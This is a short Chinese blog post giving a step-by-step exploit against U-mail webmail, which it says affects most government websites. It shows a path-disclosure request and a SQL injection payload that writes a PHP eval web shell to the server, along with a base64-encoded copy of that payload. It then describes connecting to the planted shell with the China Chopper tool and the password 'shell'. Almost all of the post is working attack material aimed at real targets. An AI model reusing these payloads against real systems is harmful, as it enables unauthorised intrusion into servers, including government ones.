大部分政府网站U-mail存在直接拿shell漏洞

加入

<code>webmail/userapply.php?execadd=333&amp;DomainID=111</code>

直接爆出物理地址

221057199775531a4c7cbf279579f953e2dbaee7.png

然后将

<code>aa' union select 1,2,3,4,5,6,'&lt;?php eval($_POST1);?&gt;',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#</code>

用base64编译一下

<code>YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==</code>

221102151f22b681832fb6e95d6fe84b04aab0d5.png

然后

<code>网站.com/webmail/fileshare.php?file=加上上面编译的base64代码</code>

可直接写入shell saknc.php

用菜刀连接

<code>网站.com/webmail/saknc.php</code>

密码:shell

并且大部分政府网站的u-mail都存在这个漏洞

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码